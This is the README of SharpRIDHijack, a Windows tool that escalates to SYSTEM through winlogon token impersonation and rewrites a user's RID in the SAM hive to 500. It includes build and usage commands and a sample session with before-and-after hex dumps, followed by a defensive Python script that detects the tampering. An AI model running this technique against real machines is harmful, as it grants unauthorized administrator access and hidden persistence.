SharpRIDHijack
SharpRIDHijack is an offensive security tool designed for performing RID (Relative Identifier) hijacking on Windows systems. It escalates privileges by impersonating the SYSTEM account and then modifies the SAM registry hive so that a specified user account carries an administrative RID.
WARNING: This tool is for authorized security testing only. Unauthorized use may violate laws and regulations. The author and contributors are not responsible for misuse. Always obtain explicit permission before testing any system.
Features
- Privilege Escalation: Escalates to SYSTEM by impersonating the winlogon process token.
- RID Hijacking: Modifies the SAM registry to assign an administrative RID (default: 500) to a target user.
Installation
Prerequisites
- .NET Framework: Version 4.7.2 or later.
- Visual Studio or MSBuild: For compiling the C# source code.
- Git: To clone the repository.
- Windows: Compatible with Windows 10/11 (other versions may require offset adjustments for SAM registry).
Steps
- Clone the repository:
PS C:\> git clone https://github.com/heqnx/SharpRIDHijack.git
PS C:\> cd SharpRIDHijack
- Compile the source code with Visual Studio by opening SharpRIDHijack.sln
- Alternatively, compile with MSBuild:
PS C:\> C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe SharpRIDHijack.csproj
Usage
Command-Line Flags
- Run SharpRIDHijack.exe with a target username to perform RID hijacking. The tool requires administrative privileges.
PS C:\> Usage: SharpRIDHijack.exe <username>
Examples
Perform RID Hijacking via Command-Line
- Hijack the RID of the lowpriv user to grant it administrative privileges:
PS C:\> SharpRIDHijack.exe lowpriv
[inf] SeDebugPrivilege enabled
[inf] Successfully impersonated WinLogon, running as NT AUTHORITY\SYSTEM
[inf] Original RID: 000003EB (1003)
[inf] Original F value:
03 00 01 00 00 00 00 00 CB 5C 3B 54 CA B5 DB 01 00 00 00 00 00 00 00 00 F4 6D 86 48 CA B5 DB 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 EB 03 00 00 01 02 00 00 10 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00
[inf] Found RID 1003 at offset 48
[inf] New F value:
03 00 01 00 00 00 00 00 CB 5C 3B 54 CA B5 DB 01 00 00 00 00 00 00 00 00 F4 6D 86 48 CA B5 DB 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 F4 01 00 00 01 02 00 00 10 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00
- Note that the user is not explicitly a member of the Administrators group when checked with net user (the output below lists only Users):
PS C:\> net user lowpriv
User name lowpriv
...
Local Group Memberships *Users
Global Group memberships *None
The command completed successfully.
- The user nevertheless shows up with the administrator RID (500) and the privileges that come with it:
PS C:\> whoami /user
USER INFORMATION
----------------
User Name SID
======================= ============================================
DESKTOP-C9VFZ4T\lowpriv S-1-5-21-1743776718-435079111-2757990620-500
PS C:\> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
========================================= ================================================================== ========
...
SeRestorePrivilege Restore files and directories Disabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
...
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
...
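The session above shows the two artifacts a defender can key on: the SAM "F" value whose RID DWORD at offset 48 no longer matches the user's subkey name, and a non-Administrator account whose SID ends in RID 500 under whoami /user. The following added example (not part of the SharpRIDHijack project) is an offline consistency check over extracted F values that flags both conditions. The F values are the ones printed in the README session; the subkey name 000003EB is assumed from the "Original RID: 000003EB" line, since the SAM hive names each user subkey by its RID in hex. Reading the live hive requires SYSTEM, so in practice the values would come from a saved hive or a forensic image.

```python
import struct

# Offset of the account RID inside the SAM "F" value, stored as a
# little-endian DWORD. Matches the tool's "Found RID 1003 at offset 48".
RID_OFFSET = 0x30
BUILTIN_ADMIN_RID = 500

# Constructed sample input: the "Original F value" and "New F value" hex
# dumps from the README session, split into 16-byte rows for readability.
ORIGINAL_F = (
    "03 00 01 00 00 00 00 00 CB 5C 3B 54 CA B5 DB 01 "
    "00 00 00 00 00 00 00 00 F4 6D 86 48 CA B5 DB 01 "
    "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 "
    "EB 03 00 00 01 02 00 00 10 00 00 00 00 00 00 00 "
    "00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00"
)
HIJACKED_F = (
    "03 00 01 00 00 00 00 00 CB 5C 3B 54 CA B5 DB 01 "
    "00 00 00 00 00 00 00 00 F4 6D 86 48 CA B5 DB 01 "
    "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 "
    "F4 01 00 00 01 02 00 00 10 00 00 00 00 00 00 00 "
    "00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00"
)

# Assumed subkey name: SAM\SAM\Domains\Account\Users\<RID as 8 hex digits>.
SAMPLE_ACCOUNTS = [
    ("000003EB", ORIGINAL_F),   # clean: key RID and F-value RID agree
    ("000003EB", HIJACKED_F),   # hijacked: F-value RID rewritten to 500
]


def parse_f_value(hex_text: str) -> bytes:
    """Turn a space-separated hex dump (as printed by the tool) into bytes."""
    return bytes.fromhex(hex_text.replace(" ", ""))


def rid_from_f_value(f_value: bytes) -> int:
    """Read the RID DWORD at offset 0x30 of an F value."""
    if len(f_value) < RID_OFFSET + 4:
        raise ValueError("F value too short to contain a RID")
    return struct.unpack_from("<I", f_value, RID_OFFSET)[0]


def rid_from_key_name(key_name: str) -> int:
    """The Users subkey name is the RID in uppercase hex, e.g. 000003EB -> 1003."""
    return int(key_name, 16)


def check_account(key_name: str, f_hex: str) -> dict:
    """Compare the RID implied by the subkey name with the RID stored in F."""
    key_rid = rid_from_key_name(key_name)
    f_rid = rid_from_f_value(parse_f_value(f_hex))
    return {
        "key": key_name,
        "key_rid": key_rid,
        "f_rid": f_rid,
        "mismatch": key_rid != f_rid,
        "admin_rid": f_rid == BUILTIN_ADMIN_RID,
    }


def scan_accounts(accounts) -> list:
    """Return the findings for every account whose F-value RID disagrees with its key."""
    return [r for r in (check_account(k, f) for k, f in accounts) if r["mismatch"]]


def rid_from_sid(sid: str) -> int:
    """Last sub-authority of a SID string, e.g. S-1-5-21-...-500 -> 500."""
    return int(sid.rsplit("-", 1)[1])


def suspicious_sid(user_name: str, sid: str) -> bool:
    """True when an account not named Administrator presents RID 500 (the whoami /user view).

    Heuristic only: the built-in account can be renamed, so confirm against the SAM check.
    """
    account = user_name.split("\\")[-1].lower()
    return rid_from_sid(sid) == BUILTIN_ADMIN_RID and account != "administrator"


if __name__ == "__main__":
    for finding in scan_accounts(SAMPLE_ACCOUNTS):
        print(f"[!] subkey {finding['key']} (RID {finding['key_rid']}) stores RID "
              f"{finding['f_rid']} in its F value"
              + (" (built-in Administrator RID)" if finding["admin_rid"] else ""))
    sid = "S-1-5-21-1743776718-435079111-2757990620-500"
    if suspicious_sid("DESKTOP-C9VFZ4T\\lowpriv", sid):
        print(f"[!] lowpriv presents administrator RID in SID {sid}")
```

The SAM check is the authoritative one: the subkey name is never changed by this technique, so any account whose F-value RID differs from its key name has been tampered with, whatever RID it was given. The SID heuristic is cheaper (it only needs whoami output or a logon event) but produces a false positive when the built-in Administrator has simply been renamed.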
Automated Releases
Check the GitHub Releases page for the new release with attached binaries.
License
This project is licensed under the GNU GENERAL PUBLIC LICENSE. See the LICENSE file for details.
Disclaimer
SharpRIDHijack is provided "as is" without warranty. The author and contributors are not liable for any damages or legal consequences arising from its use. Use responsibly and only in authorized environments.